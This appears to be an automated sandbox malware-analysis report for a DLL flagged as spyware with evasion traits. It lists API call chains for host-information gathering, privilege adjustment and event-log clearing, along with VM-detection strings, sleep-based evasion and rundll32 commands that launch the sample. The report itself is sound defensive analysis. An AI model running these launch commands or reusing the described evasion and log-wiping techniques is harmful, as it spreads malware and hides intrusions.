Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CB7D0F73_2_6CB7D0F7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBE10603_2_6CBE1060
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC0524A3_2_6CC0524A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBCD2463_2_6CBCD246
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBE93703_2_6CBE9370
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_048E0CAE4_2_048E0CAE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_048D24B04_2_048D24B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_048E11FF4_2_048E11FF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_048E2D614_2_048E2D61
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_048DB6A64_2_048DB6A6
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_048E1E2C4_2_048E1E2C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_048E17504_2_048E1750
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054C6E604_2_054C6E60
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054C6BE04_2_054C6BE0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054DDDF04_2_054DDDF0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054C24A04_2_054C24A0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054DF9FF4_2_054DF9FF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054C88704_2_054C8870
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054DD89F4_2_054DD89F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054DE3414_2_054DE341
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054D83814_2_054D8381
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054DEA1D4_2_054DEA1D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CF659F4_2_04CF659F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04D07D404_2_04D07D40
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04D0DD004_2_04D0DD00
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CF1E5F4_2_04CF1E5F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04D0D7AF4_2_04D0D7AF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CF681F4_2_04CF681F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04D0D25E4_2_04D0D25E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CF822F4_2_04CF822F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04D0F3BE4_2_04D0F3BE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_043324B05_2_043324B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04340CAE5_2_04340CAE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04342D615_2_04342D61
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_043411FF5_2_043411FF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04341E2C5_2_04341E2C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0433B6A65_2_0433B6A6
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_043417505_2_04341750
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04E86E605_2_04E86E60
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04E86BE05_2_04E86BE0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04E824A05_2_04E824A0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04E9DDF05_2_04E9DDF0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04EA978D5_2_04EA978D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04E9D89F5_2_04E9D89F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04E888705_2_04E88870
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04E9F9FF5_2_04E9F9FF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04E9EA1D5_2_04E9EA1D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04E983815_2_04E98381
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04E9E3415_2_04E9E341
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_046D7D405_2_046D7D40
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_046DDD005_2_046DDD00
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_046C659F5_2_046C659F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_046C1E5F5_2_046C1E5F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_046DD7AF5_2_046DD7AF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_046C681F5_2_046C681F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_046DD25E5_2_046DD25E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_046C822F5_2_046C822F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_046DF3BE5_2_046DF3BE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6CB68880 appears 80 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 04E942E0 appears 32 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6CC025D0 appears 48 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 054D42E0 appears 32 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6CC022D0 appears 146 times
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7544 -s 724
Source: HLMJbase.dllStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL
Source: HLMJbase.dllBinary string: HandleAfdPollInfo\Device\Afd\Mio
Source: HLMJbase.dllBinary string: Failed to open \Device\Afd\Mio:
Source: classification engineClassification label: mal72.spyw.evad.winDLL@11/5@1/2
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBE9F40 memset,GetModuleHandleW,FormatMessageW,memmove,GetLastError,3_2_6CBE9F40
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054C75A0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,OpenProcess,4_2_054C75A0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054C76C0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,4_2_054C76C0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054C7AF0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,4_2_054C7AF0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04E875A0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,OpenProcess,5_2_04E875A0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04E876C0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,5_2_04E876C0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04E87AF0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,5_2_04E87AF0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054C6BE0 wsprintfW,GetDriveTypeW,GetDiskFreeSpaceExW,_memset,GlobalMemoryStatusEx,swprintf,swprintf,4_2_054C6BE0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054C5FE0 _memset,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,CloseHandle,4_2_054C5FE0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054C6620 wsprintfW,CoInitialize,CoCreateInstance,SysFreeString,SysFreeString,CoUninitialize,4_2_054C6620
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\2024.12.19
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7492:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7544
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\116622cf-9c8a-4503-a27a-35d36a772c23Jump to behavior
Source: HLMJbase.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\HLMJbase.dll,NvOptimusEnablement
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\HLMJbase.dll"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HLMJbase.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\HLMJbase.dll,NvOptimusEnablement
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HLMJbase.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HLMJbase.dll",NvOptimusEnablement
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7544 -s 724
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HLMJbase.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\HLMJbase.dll,NvOptimusEnablementJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HLMJbase.dll",NvOptimusEnablementJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HLMJbase.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: HLMJbase.dllStatic file information: File size 1071104 > 1048576
Source: HLMJbase.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: HLMJbase.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: HLMJbase.pdb source: rundll32.exe, 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4184561254.000000006CC06000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.4183830787.000000006CC06000.00000002.00000001.01000000.00000003.sdmp, HLMJbase.dll
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBEC9B0 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,memset,GetProcAddress,GetCurrentProcess,lstrlenW,memmove,GetCurrentProcessId,CreateMutexA,CloseHandle,ReleaseMutex,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,3_2_6CBEC9B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_048E7AFE push eax; retn 0000h4_2_048E7B05
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_048D9EF5 push ecx; ret 4_2_048D9F08
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054E2443 push ebp; retf 4_2_054E2474
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054E2450 push ebp; retf 4_2_054E2474
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054E2470 push ebp; retf 4_2_054E2474
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054EA168 push eax; ret 4_2_054EA119
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054EA0B8 push eax; ret 4_2_054EA119
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054D4325 push ecx; ret 4_2_054D4338
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04D03CE4 push ecx; ret 4_2_04D03CF7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04339EF5 push ecx; ret 5_2_04339F08
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04347AFF push eax; retn 0000h5_2_04347B05
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04EA2470 push ebp; retf 5_2_04EA2474
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04EA245F push ebp; retf 5_2_04EA2474
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04EAA0B8 push eax; ret 5_2_04EAA119
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04EAA168 push eax; ret 5_2_04EAA119
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04E94325 push ecx; ret 5_2_04E94338
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_046D3CE4 push ecx; ret 5_2_046D3CF7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054CB351 OpenEventLogW,OpenEventLogW,ClearEventLogW,CloseEventLog,4_2_054CB351
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 3324Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 5607Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 5644Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 3281Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 9.1 %
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7880Thread sleep count: 284 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7972Thread sleep count: 54 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7972Thread sleep time: -54000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7996Thread sleep count: 3324 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7996Thread sleep time: -33240s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7972Thread sleep count: 5607 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7972Thread sleep time: -5607000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7940Thread sleep count: 245 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 8024Thread sleep count: 5644 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 8024Thread sleep time: -5644000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 8032Thread sleep count: 3281 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 8032Thread sleep time: -32810s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exeThread sleep count: Count: 3324 delay: -10Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread sleep count: Count: 3281 delay: -10Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054C8060 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,4_2_054C8060
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054C53C0 _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,4_2_054C53C0
Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
Source: Amcache.hve.8.drBinary or memory string: VMware
Source: Amcache.hve.8.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.8.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.8.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.8.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.8.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.8.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.8.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.8.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.8.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.8.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: rundll32.exe, 00000003.00000003.1770250771.000000000286B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.2008105051.000000000286D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1770502384.000000000286D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1738954589.000000000286D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1770216842.0000000002CBD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1738806367.0000000002CBD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4176037293.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1833709462.0000000002CBD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1844676174.000000000276D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1795518550.000000000276D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1795184851.000000000276D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.8.drBinary or memory string: vmci.sys
Source: Amcache.hve.8.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.8.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.8.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.8.drBinary or memory string: VMware20,1
Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.8.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.8.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.8.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.8.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.8.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.8.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.8.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.8.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.8.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC016E3 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6CC016E3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054D04AB VirtualProtect ?,-00000001,00000104,?4_2_054D04AB
